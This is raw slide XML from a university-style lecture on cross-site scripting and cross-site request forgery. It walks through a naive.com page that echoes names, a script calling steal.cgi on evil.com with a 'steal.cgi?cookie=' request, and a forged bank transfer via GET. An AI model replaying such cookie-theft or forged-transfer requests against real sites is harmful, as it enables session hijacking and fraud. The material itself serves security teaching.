          <a:ln w="1260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</a:rPr>
              <a:t>Interpreted as Javascript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</a:rPr>
              <a:t>by victim’s browser;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</a:rPr>
              <a:t>opens window and calls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Tahoma"/>
              </a:rPr>
              <a:t>steal.cgi on evil.com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89" name="Picture 26" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6068880" y="3792960"/>
            <a:ext cx="649800" cy="433080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Picture 27" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453160" y="3467880"/>
            <a:ext cx="433080" cy="288720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Line 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1842120" y="7888320"/>
            <a:ext cx="4010040" cy="456120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167560" y="7911360"/>
            <a:ext cx="3575880" cy="3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7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ahoma"/>
              </a:rPr>
              <a:t>GET/ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>steal.cgi?cookie=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93" name="Picture 31" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5093640" y="7947360"/>
            <a:ext cx="433080" cy="288720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Picture 32" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="975240" y="8128080"/>
            <a:ext cx="649800" cy="433080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="CustomShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317880" y="690840"/>
            <a:ext cx="3144600" cy="1042560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28750"/>
              <a:gd name="adj2" fmla="val 254524"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="8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9960" rIns="129960" tIns="65160" bIns="65160"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0d0d0d"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Echoes user’s name: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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0d0d0d"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;Hello, dear …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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0d0d0d"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;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96" name="CustomShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11054160" y="3833640"/>
            <a:ext cx="1625400" cy="758160"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="dddddd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40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>hello.cgi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7" name="CustomShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10156320" y="2384280"/>
            <a:ext cx="1841400" cy="4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9960" rIns="129960" tIns="65160" bIns="6516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0458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>naive.com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8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nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="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nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="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nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="10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0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F63EF185-05EB-43A1-BCC9-17019F126766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-25560" y="0"/>
            <a:ext cx="13029840" cy="1420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CSRF Attack: Bank Example*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pic>
        <p:nvPicPr>
          <p:cNvPr id="400" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893960" y="1420560"/>
            <a:ext cx="9101520" cy="5688360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453600" y="7324920"/>
            <a:ext cx="1195308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Transfer money from one account to another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When the “Continue” button is pressed, an http POST request is submitted by the user browser to the server (bank)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7510680" y="9125280"/>
            <a:ext cx="4608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Example courtesy https://www.whitehatsec.com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2585600" y="9321840"/>
            <a:ext cx="342720" cy="36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fld id="{DFBEC4CA-55F0-4AF6-9D74-A435D4E4B749}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>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-25560" y="0"/>
            <a:ext cx="13029840" cy="1420560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50760" rIns="50760" tIns="50760" bIns="50760" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>CSRF Attack: Bank Example*</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="56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453600" y="5380920"/>
            <a:ext cx="1195308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If the request was successful, $5,000 would be transferred from account “314159265” to account “01123581.”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What’s interesting is that many Web applications, such as transfer_funds.cgi, do not distinguish between parameters sent using GET or POST.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In other words, the same request with POST replaced with GET is completely legit as far as the server is concerned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06" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="813600" y="1348560"/>
            <a:ext cx="11637720" cy="3456000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="1276560"/>
            <a:ext cx="1944000" cy="1079640"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2a2a88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Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>GET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7510680" y="9125280"/>
            <a:ext cx="460800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ill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Example courtesy https://www.whitehatsec.com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10" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="111" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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09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51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Application>LibreOffice/5.4.1.2$Linux_X86_64 LibreOffice_project/40m0$Build-2</Application>
  <Pages>0</Pages>
  <Words>1682</Words>
  <Characters>0</Characters>
  <Paragraphs>263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Vijay Ganesh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-02-28T19:14:32Z</dcterms:modified>
  <cp:revision>216</cp:revision>
  <dc:subject/>
  <dc:title>Cross-site Request Forgery (CSRF) Attacks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